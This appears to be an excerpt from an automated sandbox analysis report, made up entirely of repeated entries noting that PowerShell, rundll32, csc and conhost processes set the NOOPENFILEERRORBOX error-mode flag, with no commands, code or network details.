                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
